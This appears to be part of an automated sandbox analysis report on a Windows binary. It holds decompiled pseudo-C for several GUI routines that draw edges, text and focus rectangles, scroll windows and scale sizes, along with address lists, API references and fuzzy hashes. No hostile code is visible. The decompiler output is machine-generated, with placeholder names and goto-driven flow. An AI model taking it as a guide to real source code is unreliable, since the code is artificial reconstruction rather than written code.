															__eflags =  *(_t202 - 0x84) |  *(_t253 - 0x88);
															if(( *(_t202 - 0x84) |  *(_t253 - 0x88)) != 0) {
																asm("movsd");
																asm("movsd");
																asm("movsd");
																asm("movsd");
																_t257 = _t257;
																_t205 = _a24;
																__eflags =  *(_t205 - 0x84) & 0x00000004;
																if(( *(_t205 - 0x84) & 0x00000004) != 0) {
																	_t206 = _a24;
																	__eflags =  *(_t206 - 0x84) & 0x00000008;
																	if(( *(_t206 - 0x84) & 0x00000008) == 0) {
																		_t88 =  &(_v65.bottom);
																		 *_t88 = _v65.bottom +  *((intOrPtr*)(_a24 - 0x40));
																		__eflags =  *_t88;
																	}
																} else {
																	_v65.right = _v65.right +  *((intOrPtr*)(_a24 - 0x70));
																}
																DrawEdge(E00420244( *((intOrPtr*)( *_t240 + 0x208))),  &_v65, 4,  *(_a24 - 0x84));
																DrawEdge(E00420244( *((intOrPtr*)( *_t240 + 0x208))),  &_v65, 4,  *(_a24 - 0x88));
															}
														}
													}
												}
												_t181 =  *_t240;
												__eflags =  *((char*)(_t181 + 0x28c));
												if( *((char*)(_t181 + 0x28c)) != 0) {
													_t182 =  *_t240;
													__eflags =  *(_t182 + 0x1c) & 0x00000010;
													if(( *(_t182 + 0x1c) & 0x00000010) == 0) {
														__eflags = _v17 & 0x00000002;
														if((_v17 & 0x00000002) != 0) {
															_t183 =  *_t240;
															_t252 =  *0x45f788; // 0x2400
															__eflags = _t252 - ( *(_t183 + 0x248) &  *0x45f788);
															if(_t252 != ( *(_t183 + 0x248) &  *0x45f788)) {
																__eflags =  *( *_t240 + 0x249) & 0x00000010;
																if(__eflags == 0) {
																	_t188 = E004037B0( *_t240, __eflags);
																	__eflags = _t188;
																	if(_t188 != 0) {
																		asm("movsd");
																		asm("movsd");
																		asm("movsd");
																		asm("movsd");
																		_t257 = _t257;
																		_v33.left = _v49.right;
																		_v33.right = _v49.left;
																		DrawFocusRect(E00420244( *((intOrPtr*)( *_t240 + 0x208))),  &_v33);
																	} else {
																		DrawFocusRect(E00420244( *((intOrPtr*)( *_t240 + 0x208))),  &_v49);
																	}
																}
															}
														}
													}
												}
												goto L39;
											}
											__eflags = _v17 & 0x00000002;
											if(__eflags == 0) {
												L19:
												E0041F7B8( *((intOrPtr*)(_t260 + 0x14)), _t242, 0x8000000d, _t257, _t265, __eflags);
												E0041EFCC( *((intOrPtr*)(_t260 + 0xc)), 0x8000000e);
												goto L21;
											}
											_t256 =  *0x45f784; // 0x0
											__eflags = _t256 - ( *( *_t240 + 0x248) &  *0x45f780);
											if(__eflags == 0) {
												goto L20;
											}
											goto L19;
										}
										_t232 =  *_t240;
										__eflags =  *(_t232 + 0x1c) & 0x00000010;
										if(( *(_t232 + 0x1c) & 0x00000010) == 0) {
											goto L22;
										}
										goto L16;
									}
									_t233 =  *_t240;
									__eflags =  *(_t233 + 0x249) & 0x00000004;
									if(( *(_t233 + 0x249) & 0x00000004) == 0) {
										goto L14;
									}
									_t234 =  *_t240;
									__eflags =  *((char*)(_t234 + 0x28d));
									if( *((char*)(_t234 + 0x28d)) == 0) {
										goto L14;
									}
									_t235 =  *_t240;
									__eflags =  *(_t235 + 0x1c) & 0x00000010;
									if(( *(_t235 + 0x1c) & 0x00000010) == 0) {
										goto L39;
									}
									goto L14;
								}
							}
							break;
						}
						_v49.top =  *((intOrPtr*)(_a24 - 0x40)) + _v49.bottom;
						_t130 =  &_v16;
						 *_t130 = _v16 + 1;
						__eflags =  *_t130;
						continue;
					}
					break;
				}
				return _t138;
			}

0x0045f45d
0x0045f460
0x0045f466
0x0045f469
0x0045f46f
0x0045f75d
0x0045f75d
0x0045f763
0x00000000
0x00000000
0x0045f767
0x0045f770
0x0045f477
0x0045f47d
0x0045f48d
0x0045f738
0x0045f73b
0x0045f73e
0x00000000
0x00000000
0x0045f740
0x0045f742
0x0045f748
0x0045f4a1
0x0045f4a7
0x0045f4aa
0x0045f72b
0x0045f734
0x0045f737
0x0045f737
0x00000000
0x0045f737
0x0045f4c7
0x0045f4c9
0x00000000
0x0045f4cf
0x0045f4d2
0x0045f4d7
0x0045f4dc
0x0045f4de
0x0045f4e0
0x0045f4e8
0x0045f4eb
0x0045f4ed
0x0045f4ef
0x0045f4f5
0x0045f4f7
0x0045f4f7
0x0045f4f7
0x0045f4f7
0x0045f4f5
0x0045f4eb
0x0045f4fe
0x0045f506
0x0045f50b
0x0045f50d
0x0045f50f
0x0045f50f
0x0045f50f
0x0045f50f
0x0045f513
0x0045f517
0x0045f53b
0x0045f53b
0x0045f53d
0x0045f544
0x0045f54e
0x0045f550
0x0045f55d
0x0045f562
0x0045f566
0x0045f5a6
0x0045f5ac
0x0045f5b1
0x0045f5b6
0x0045f5bb
0x0045f5cc
0x0045f5d2
0x0045f5d4
0x0045f5db
0x0045f5e1
0x0045f5e5
0x0045f5eb
0x0045f5ed
0x0045f5f4
0x0045f5fa
0x0045f603
0x0045f606
0x0045f60c
0x0045f615
0x0045f616
0x0045f617
0x0045f618
0x0045f619
0x0045f61a
0x0045f61d
0x0045f624
0x0045f631
0x0045f634
0x0045f63b
0x0045f643
0x0045f643
0x0045f643
0x0045f643
0x0045f626
0x0045f62c
0x0045f62c
0x0045f664
0x0045f687
0x0045f687
0x0045f60c
0x0045f5f4
0x0045f5e5
0x0045f68c
0x0045f68e
0x0045f695
0x0045f69b
0x0045f69d
0x0045f6a1
0x0045f6a7
0x0045f6ab
0x0045f6ad
0x0045f6bd
0x0045f6c4
0x0045f6c7
0x0045f6cb
0x0045f6d2
0x0045f6da
0x0045f6df
0x0045f6e1
0x0045f703
0x0045f704
0x0045f705
0x0045f706
0x0045f707
0x0045f70b
0x0045f711
0x0045f726
0x0045f6e3
0x0045f6f5
0x0045f6f5
0x0045f6e1
0x0045f6d2
0x0045f6c7
0x0045f6ab
0x0045f6a1
0x00000000
0x0045f695
0x0045f568
0x0045f56c
0x0045f58a
0x0045f592
0x0045f59f
0x00000000
0x0045f59f
0x0045f57e
0x0045f585
0x0045f588
0x00000000
0x00000000
0x00000000
0x0045f588
0x0045f546
0x0045f548
0x0045f54c
0x00000000
0x00000000
0x00000000
0x0045f54c
0x0045f519
0x0045f51b
0x0045f522
0x00000000
0x00000000
0x0045f524
0x0045f526
0x0045f52d
0x00000000
0x00000000
0x0045f52f
0x0045f531
0x0045f535
0x00000000
0x00000000
0x00000000
0x0045f535
0x0045f4c9
0x00000000
0x0045f748
0x0045f757
0x0045f75a
0x0045f75a
0x0045f75a
0x00000000
0x0045f75a
0x00000000
0x0045f770
0x0045f77c

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 291672cb03b6b348231bbd77b757c6f2ad9f55b06839b359aaf34f81d31a35fc
Instruction ID: b4e9dd2361f3f3499cadb4ed65a74cec6556d423131664ea70124733f558b63e
Opcode Fuzzy Hash: 291672cb03b6b348231bbd77b757c6f2ad9f55b06839b359aaf34f81d31a35fc
Instruction Fuzzy Hash: 04B12875A005189FCB10DF5CC088BDEB7F5AF09304F5440A6ED48AB366D778AC4ACB6A

Uniqueness

Uniqueness Score: -1.00%

Function 00451C90, Relevance: 7.7, APIs: 5, Instructions: 171
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00451C90(intOrPtr __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				signed char _t92;
				int _t98;
				int _t100;
				intOrPtr _t117;
				int _t122;
				intOrPtr _t155;
				void* _t164;
				signed char _t180;
				intOrPtr _t182;
				intOrPtr _t194;
				int _t199;
				intOrPtr _t203;
				void* _t204;

				_t204 = __eflags;
				_t202 = _t203;
				_v8 = __eax;
				E0043BD60(_v8);
				_push(_t203);
				_push(0x451ee6);
				_push( *[fs:edx]);
				 *[fs:edx] = _t203;
				 *(_v8 + 0x268) = 0;
				 *(_v8 + 0x26c) = 0;
				 *(_v8 + 0x270) = 0;
				_t164 = 0;
				_t92 =  *0x48f709; // 0x0
				 *(_v8 + 0x234) = _t92 ^ 0x00000001;
				E0043B4D0(_v8, 0, __edx, _t204);
				if( *(_v8 + 0x25c) == 0 ||  *(_v8 + 0x270) <= 0) {
					L12:
					_t98 =  *(_v8 + 0x268);
					_t213 = _t98;
					if(_t98 > 0) {
						E004386D8(_v8, _t98, _t213);
					}
					_t100 =  *(_v8 + 0x26c);
					_t214 = _t100;
					if(_t100 > 0) {
						E0043871C(_v8, _t100, _t214);
					}
					_t180 =  *0x451ef4; // 0x0
					 *(_v8 + 0x98) = _t180;
					_t215 = _t164;
					if(_t164 == 0) {
						E004511F8(_v8, 1, 1);
						E0043EE74(_v8, 1, 1, _t215);
					}
					E00439EA4(_v8, 0, 0xb03d, 0);
					_pop(_t182);
					 *[fs:eax] = _t182;
					_push(0x451eed);
					return E0043BD68(_v8);
				} else {
					if(( *(_v8 + 0x98) & 0x00000010) != 0) {
						_t194 =  *0x48fc00; // 0x21d0f1c
						if( *(_v8 + 0x25c) !=  *((intOrPtr*)(_t194 + 0x40))) {
							_t155 =  *0x48fc00; // 0x21d0f1c
							E0041F1B4( *((intOrPtr*)(_v8 + 0x68)), MulDiv(E0041F1AC( *((intOrPtr*)(_v8 + 0x68))),  *(_t155 + 0x40),  *(_v8 + 0x25c)), __edi, _t202);
						}
					}
					_t117 =  *0x48fc00; // 0x21d0f1c
					 *(_v8 + 0x25c) =  *(_t117 + 0x40);
					_t199 = E00452018(_v8);
					_t122 =  *(_v8 + 0x270);
					_t209 = _t199 - _t122;
					if(_t199 != _t122) {
						_t164 = 1;
						E004511F8(_v8, _t122, _t199);
						E0043EE74(_v8,  *(_v8 + 0x270), _t199, _t209);
						if(( *(_v8 + 0x98) & 0x00000004) != 0) {
							 *(_v8 + 0x268) = MulDiv( *(_v8 + 0x268), _t199,  *(_v8 + 0x270));
						}
						if(( *(_v8 + 0x98) & 0x00000008) != 0) {
							 *(_v8 + 0x26c) = MulDiv( *(_v8 + 0x26c), _t199,  *(_v8 + 0x270));
						}
						if(( *(_v8 + 0x98) & 0x00000020) != 0) {
							 *(_v8 + 0x1fa) = MulDiv( *(_v8 + 0x1fa), _t199,  *(_v8 + 0x270));
							 *(_v8 + 0x1fe) = MulDiv( *(_v8 + 0x1fe), _t199,  *(_v8 + 0x270));
						}
					}
					goto L12;
				}
			}

0x00451c90
0x00451c91
0x00451c98
0x00451c9e
0x00451ca5
0x00451ca6
0x00451cab
0x00451cae
0x00451cb6
0x00451cc1
0x00451ccc
0x00451cd2
0x00451cd4
0x00451cde
0x00451ce9
0x00451cf8
0x00451e5a
0x00451e5d
0x00451e63
0x00451e65
0x00451e6c
0x00451e6c
0x00451e74
0x00451e7a
0x00451e7c
0x00451e83
0x00451e83
0x00451e8b
0x00451e91
0x00451e97
0x00451e99
0x00451ea8
0x00451eba
0x00451eba
0x00451ecb
0x00451ed2
0x00451ed5
0x00451ed8
0x00451ee5
0x00451d0e
0x00451d18
0x00451d23
0x00451d2c
0x00451d38
0x00451d58
0x00451d58
0x00451d2c
0x00451d5d
0x00451d68
0x00451d76
0x00451d7b
0x00451d81
0x00451d83
0x00451d89
0x00451d92
0x00451da5
0x00451db4
0x00451dd3
0x00451dd3
0x00451de3
0x00451e02
0x00451e02
0x00451e12
0x00451e31
0x00451e54
0x00451e54
0x00451e12
0x00000000
0x00451d83

APIs

MulDiv.KERNEL32(00000000,?,00000000), ref: 00451D4F
MulDiv.KERNEL32(?,00000000,00000000), ref: 00451DCB
MulDiv.KERNEL32(?,00000000,00000000), ref: 00451DFA
MulDiv.KERNEL32(?,00000000,00000000), ref: 00451E29
MulDiv.KERNEL32(?,00000000,00000000), ref: 00451E4C

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b4eb30459db01a10f30461069ae4cc54e604348172e9ad259c6495fe1880cb4
Instruction ID: 0e5b86d717b15d9533dc8caa314275a7ada1c464aef0b82d17d310680002eed7
Opcode Fuzzy Hash: 6b4eb30459db01a10f30461069ae4cc54e604348172e9ad259c6495fe1880cb4
Instruction Fuzzy Hash: 5D71C674A04104EFDB00DBA9C58AFAEB7F5AF49304F2541F9E808DB362C735AE459B44

Uniqueness

Uniqueness Score: -1.00%

Function 00461670, Relevance: 7.7, APIs: 5, Instructions: 168
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00461670(void* __eax, int __ecx, signed int __edx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				struct tagRECT _v28;
				char _v44;
				int _t90;
				void* _t109;
				void* _t112;
				void* _t125;
				void* _t131;
				intOrPtr _t142;
				int _t143;

				_t143 = __ecx;
				_v8 = __edx;
				_t125 = __eax;
				_t142 = _a4;
				_v12 = 2;
				if( *((char*)(__eax + 0x28c)) == 0) {
					_v12 = _v12 | 0x00000004;
				}
				_t147 = _t143;
				if(_t143 != 0) {
					__eflags = _v8;
					if(__eflags != 0) {
						_t29 = _t142 + 0x34; // 0xe89c933
						_t31 = _t142 + 0xc; // 0x895653ec
						_t32 = _t142 + 4; // 0x55c35b5e
						E00412AB0( *_t32,  *_t31, 0,  &_v28,  *_t29);
						ScrollWindowEx(E0043F370(_t125), _v8, 0,  &_v28,  &_v28, 0, 0, _v12);
						_t37 = _t142 + 0x3c; // 0x55894233
						_t39 = _t142 + 4; // 0x55c35b5e
						_t40 = _t142 + 0x34; // 0xe89c933
						__eflags = 0;
						E00412AB0(0,  *_t39,  *_t40,  &_v28,  *_t37);
						ScrollWindowEx(E0043F370(_t125), 0, _t143,  &_v28,  &_v28, 0, 0, _v12);
						_t44 = _t142 + 0x3c; // 0x55894233
						_t46 = _t142 + 0xc; // 0x895653ec
						_t47 = _t142 + 0x34; // 0xe89c933
						_t48 = _t142 + 4; // 0x55c35b5e
						E00412AB0( *_t48,  *_t46,  *_t47,  &_v28,  *_t44);
						_t90 = ScrollWindowEx(E0043F370(_t125), _v8, _t143,  &_v28,  &_v28, 0, 0, _v12);
					} else {
						_t22 = _t142 + 0x3c; // 0x55894233
						_t24 = _t142 + 0xc; // 0x895653ec
						_t25 = _t142 + 0x34; // 0xe89c933
						E00412AB0(0,  *_t24,  *_t25,  &_v28,  *_t22);
						_t90 = ScrollWindowEx(E0043F370(_t125), 0, _t143,  &_v28,  &_v28, 0, 0, _v12);
					}
				} else {
					if(E004037B0(_t125, _t147) != 0) {
						_t11 = _t142 + 0x3c; // 0x55894233
						_push( *_t11);
						_push( &_v28);
						_t109 = E004386C0(_t125);
						_t13 = _t142 + 4; // 0x55c35b5e
						_push(_t109 -  *_t13);
						_t112 = E004386C0(_t125);
						_t14 = _t142 + 0xc; // 0x895653ec
						__eflags = 0;
						_pop(_t131);
						E00412AB0(_t112 -  *_t14, _t131, 0);
						_v8 =  ~_v8;
					} else {
						_t7 = _t142 + 0x3c; // 0x55894233
						_t9 = _t142 + 0xc; // 0x895653ec
						_t10 = _t142 + 4; // 0x55c35b5e
						E00412AB0( *_t10,  *_t9, 0,  &_v28,  *_t7);
					}
					_t90 = ScrollWindowEx(E0043F370(_t125), _v8, 0,  &_v28,  &_v28, 0, 0, _v12);
				}
				_t149 =  *(_t125 + 0x249) & 0x00000010;
				if(( *(_t125 + 0x249) & 0x00000010) == 0) {
					return _t90;
				} else {
					E00462E7C(_t125,  &_v44);
					return E00460D6C(_t125,  &_v44, _t149);
				}
			}

0x00461679
0x0046167b
0x0046167e
0x00461680
0x00461683
0x00461691
0x00461693
0x00461693
0x00461697
0x00461699
0x00461711
0x00461715
0x00461751
0x00461759
0x0046175c
0x00461761
0x00461784
0x00461789
0x00461791
0x00461794
0x00461797
0x00461799
0x004617b9
0x004617be
0x004617c6
0x004617c9
0x004617cc
0x004617cf
0x004617f1
0x00461717
0x00461717
0x0046171f
0x00461722
0x00461727
0x00461747
0x00461747
0x0046169b
0x004616a8
0x004616c1
0x004616c4
0x004616c8
0x004616cb
0x004616d0
0x004616d3
0x004616d6
0x004616db
0x004616de
0x004616e0
0x004616e1
0x004616e6
0x004616aa
0x004616aa
0x004616b2
0x004616b5
0x004616ba
0x004616ba
0x00461707
0x00461707
0x004617f6
0x004617fd
0x00461819
0x004617ff
0x00461804
0x00000000
0x0046180e

APIs

ScrollWindowEx.USER32 ref: 00461707
ScrollWindowEx.USER32 ref: 00461747
ScrollWindowEx.USER32 ref: 00461784
ScrollWindowEx.USER32 ref: 004617B9
ScrollWindowEx.USER32 ref: 004617F1

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: ScrollWindow
String ID:
API String ID: 2126015319-0
Opcode ID: b7d6ec1451abac277d570761dfb0fe26c4282e162535dcda5698a1e1f187b957
Instruction ID: 8d79e7150e47965d6d92bec0e408df0ecc16c9197a668feb19aa42116886768c
Opcode Fuzzy Hash: b7d6ec1451abac277d570761dfb0fe26c4282e162535dcda5698a1e1f187b957
Instruction Fuzzy Hash: CD5120B5A00509BBD710DAA5CD82FEFB7BCAF08304F005126BA05E7681DB74E954CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 00449058, Relevance: 7.7, APIs: 5, Instructions: 162
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00449058(void* __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, int _a4, char _a8, struct tagRECT* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v16;
				struct tagRECT _v32;
				void* _t53;
				int _t63;
				CHAR* _t65;
				void* _t76;
				void* _t78;
				int _t89;
				CHAR* _t91;
				int _t117;
				intOrPtr _t127;
				void* _t139;
				void* _t144;
				char _t153;

				_t120 = __ecx;
				_t143 = _t144;
				_v16 = 0;
				_v12 = __ecx;
				_v8 = __edx;
				_t139 = __eax;
				_t117 = _a4;
				_push(_t144);
				_push(0x44923c);
				_push( *[fs:eax]);
				 *[fs:eax] = _t144 + 0xffffffe4;
				_t53 = E0044AEBC(__eax);
				_t135 = _t53;
				if(_t53 != 0 && E0044C4F8(_t135) != 0) {
					if((_t117 & 0x00000000) != 0) {
						__eflags = (_t117 & 0x00000002) - 2;
						if((_t117 & 0x00000002) == 2) {
							_t117 = _t117 & 0xfffffffd;
							__eflags = _t117;
						}
					} else {
						_t117 = _t117 & 0xffffffff | 0x00000002;
					}
					_t117 = _t117 | 0x00020000;
				}
				E004043B8( &_v16, _v12);
				if((_t117 & 0x00000004) == 0) {
					L12:
					E0040471C(_v16, 0x449260);
					if(_t153 != 0) {
						E0041F8D4( *((intOrPtr*)(_v8 + 0x14)), _t120, 1, _t135, _t143, __eflags);
						__eflags =  *((char*)(_t139 + 0x3a));
						if( *((char*)(_t139 + 0x3a)) != 0) {
							_t136 =  *((intOrPtr*)(_v8 + 0xc));
							__eflags = E0041F28C( *((intOrPtr*)(_v8 + 0xc))) |  *0x449264;
							E0041F298( *((intOrPtr*)(_v8 + 0xc)), E0041F28C( *((intOrPtr*)(_v8 + 0xc))) |  *0x449264, _t136, _t139, _t143);
						}
						__eflags =  *((char*)(_t139 + 0x39));
						if( *((char*)(_t139 + 0x39)) != 0) {
							L24:
							_t63 = E004045D8(_v16);
							_t65 = E004047D0(_v16);
							DrawTextA(E00420244(_v8), _t65, _t63, _a12, _t117);
							L25:
							_pop(_t127);
							 *[fs:eax] = _t127;
							_push(0x449243);
							return E00404320( &_v16);
						} else {
							__eflags = _a8;
							if(_a8 == 0) {
								OffsetRect(_a12, 1, 1);
								E0041EFCC( *((intOrPtr*)(_v8 + 0xc)), 0x80000014);
								_t89 = E004045D8(_v16);
								_t91 = E004047D0(_v16);
								DrawTextA(E00420244(_v8), _t91, _t89, _a12, _t117);
								OffsetRect(_a12, 0xffffffff, 0xffffffff);
							}
							__eflags = _a8;
							if(_a8 == 0) {
								L23:
								E0041EFCC( *((intOrPtr*)(_v8 + 0xc)), 0x80000010);
							} else {
								_t76 = E0041EB0C(0x8000000d);
								_t78 = E0041EB0C(0x80000010);
								__eflags = _t76 - _t78;
								if(_t76 != _t78) {
									goto L23;
								}
								E0041EFCC( *((intOrPtr*)(_v8 + 0xc)), 0x80000014);
							}
							goto L24;
						}
					}
					if((_t117 & 0x00000004) == 0) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_v32.top = _v32.top + 4;
						DrawEdge(E00420244(_v8),  &_v32, 6, 2);
					}
					goto L25;
				} else {
					if(_v16 == 0) {
						L11:
						E004045E0( &_v16, 0x449254);
						goto L12;
					}
					if( *_v16 != 0x26) {
						goto L12;
					}
					_t153 =  *((char*)(_v16 + 1));
					if(_t153 != 0) {
						goto L12;
					}
					goto L11;
				}
			}

0x00449058
0x00449059
0x00449063
0x00449066
0x00449069
0x0044906c
0x0044906e
0x00449073
0x00449074
0x00449079
0x0044907c
0x00449081
0x00449086
0x0044908a
0x0044909a
0x004490a9
0x004490ac
0x004490b1
0x004490b1
0x004490b1
0x0044909c
0x0044909f
0x0044909f
0x004490b4
0x004490b4
0x004490c0
0x004490c8
0x004490ee
0x004490f6
0x004490fb
0x00449139
0x0044913e
0x00449142
0x00449147
0x00449153
0x0044915b
0x0044915b
0x00449160
0x00449164
0x00449201
0x00449209
0x00449212
0x00449221
0x00449226
0x00449228
0x0044922b
0x0044922e
0x0044923b
0x0044916a
0x0044916a
0x0044916e
0x00449178
0x00449188
0x00449195
0x0044919e
0x004491ad
0x004491ba
0x004491ba
0x004491bf
0x004491c3
0x004491f1
0x004491fc
0x004491c5
0x004491ca
0x004491d6
0x004491db
0x004491dd
0x00000000
0x00000000
0x004491ea
0x004491ea
0x00000000
0x004491c3
0x00449164
0x00449100
0x0044910e
0x0044910f
0x00449110
0x00449111
0x00449112
0x00449127
0x00449127
0x00000000
0x004490ca
0x004490ce
0x004490e1
0x004490e9
0x00000000
0x004490e9
0x004490d6
0x00000000
0x00000000
0x004490db
0x004490df
0x00000000
0x00000000
0x00000000
0x004490df

APIs

DrawEdge.USER32(00000000,?,00000006,00000002), ref: 00449127
OffsetRect.USER32(?,00000001,00000001), ref: 00449178
DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 004491AD
OffsetRect.USER32(?,000000FF,000000FF), ref: 004491BA
DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 00449221

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Draw$OffsetRectText$Edge
String ID:
API String ID: 3610532707-0
Opcode ID: 7bc41e932a2a0dc8eff16413343ed9810a5e00d9927b86b0125edd31ef4db6ba
Instruction ID: 0315fe29241311e4b7b4390945ba64807feb0dbb905db5fae7eb725f17219ade
Opcode Fuzzy Hash: 7bc41e932a2a0dc8eff16413343ed9810a5e00d9927b86b0125edd31ef4db6ba
Instruction Fuzzy Hash: 8E518370A04209AFEB10EBA9C885B9FB7E5AF45314F1481ABFD10E7392C77CAD409719

Uniqueness

Uniqueness Score: -1.00%

Function 0042AEC4, Relevance: 7.6, APIs: 5, Instructions: 110
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E0042AEC4(intOrPtr* __eax, void* __ebx, signed int __ecx, struct tagRECT* __edx, void* __edi, void* __esi) {
				char _v8;
				int _t40;
				CHAR* _t42;
				int _t54;
				CHAR* _t56;
				int _t65;
				CHAR* _t67;
				intOrPtr* _t76;
				intOrPtr _t86;
				struct tagRECT* _t91;
				signed int _t93;
				int _t94;
				intOrPtr _t97;
				signed int _t104;

				_push(0);
				_t93 = __ecx;
				_t91 = __edx;
				_t76 = __eax;
				_push(_t97);
				_push(0x42b01a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t97;
				 *((intOrPtr*)( *__eax + 0x90))();
				if((__ecx & 0x00000400) != 0 && (_v8 == 0 ||  *((char*)(__eax + 0x170)) != 0 &&  *_v8 == 0x26 &&  *((char*)(_v8 + 1)) == 0)) {
					E004045E0( &_v8, 0x42b030);
				}
				if( *((char*)(_t76 + 0x170)) == 0) {
					_t104 = _t93;
				}
				_t94 = E0043AFD4(_t76, _t93, _t104);
				E00420140( *((intOrPtr*)(_t76 + 0x160)));
				if( *((intOrPtr*)( *_t76 + 0x50))() != 0) {
					_t40 = E004045D8(_v8);
					_t42 = E004047D0(_v8);
					DrawTextA(E00420244( *((intOrPtr*)(_t76 + 0x160))), _t42, _t40, _t91, _t94);
				} else {
					OffsetRect(_t91, 1, 1);
					E0041EFCC( *((intOrPtr*)( *((intOrPtr*)(_t76 + 0x160)) + 0xc)), 0x80000014);
					_t54 = E004045D8(_v8);
					_t56 = E004047D0(_v8);
					DrawTextA(E00420244( *((intOrPtr*)(_t76 + 0x160))), _t56, _t54, _t91, _t94);
					OffsetRect(_t91, 0xffffffff, 0xffffffff);
					E0041EFCC( *((intOrPtr*)( *((intOrPtr*)(_t76 + 0x160)) + 0xc)), 0x80000010);
					_t65 = E004045D8(_v8);
					_t67 = E004047D0(_v8);
					DrawTextA(E00420244( *((intOrPtr*)(_t76 + 0x160))), _t67, _t65, _t91, _t94);
				}
				_pop(_t86);
				 *[fs:eax] = _t86;
				_push(0x42b021);
				return E00404320( &_v8);
			}

0x0042aec7
0x0042aecc
0x0042aece
0x0042aed0
0x0042aed4
0x0042aed5
0x0042aeda
0x0042aedd
0x0042aee7
0x0042aef3
0x0042af1d
0x0042af1d
0x0042af29
0x0042af2b
0x0042af2b
0x0042af3a
0x0042af45
0x0042af53
0x0042afe4
0x0042afed
0x0042afff
0x0042af59
0x0042af5e
0x0042af71
0x0042af7b
0x0042af84
0x0042af96
0x0042afa0
0x0042afb3
0x0042afbd
0x0042afc6
0x0042afd8
0x0042afd8
0x0042b006
0x0042b009
0x0042b00c
0x0042b019

APIs

OffsetRect.USER32(?,00000001,00000001), ref: 0042AF5E
DrawTextA.USER32(00000000,00000000,00000000,?,00000000), ref: 0042AF96
OffsetRect.USER32(?,000000FF,000000FF), ref: 0042AFA0
DrawTextA.USER32(00000000,00000000,00000000,?,00000000), ref: 0042AFD8
DrawTextA.USER32(00000000,00000000,00000000,?,00000000), ref: 0042AFFF

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: DrawText$OffsetRect
String ID:
API String ID: 1886049697-0
Opcode ID: 1b216df02a533e744f27e749048df342cc6bb4e73506a8c15d6ed567fa9d56b9
Instruction ID: 7a5556691b9469cd6711c44107b66f3bf77f825cfa8b35f220917139b22661ea
Opcode Fuzzy Hash: 1b216df02a533e744f27e749048df342cc6bb4e73506a8c15d6ed567fa9d56b9
Instruction Fuzzy Hash: 45318270704114AFDB11EB6ADC85F8BB7E8AF45318F5540BBB808EB292CB7C9D109769

Uniqueness

Uniqueness Score: -1.00%

Function 0043D0C0, Relevance: 7.6, APIs: 5, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E0043D0C0(intOrPtr* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				intOrPtr _v12;
				int _v16;
				int _v20;
				struct tagPAINTSTRUCT _v84;
				intOrPtr _t55;
				void* _t64;
				struct HDC__* _t75;
				intOrPtr _t84;
				void* _t95;
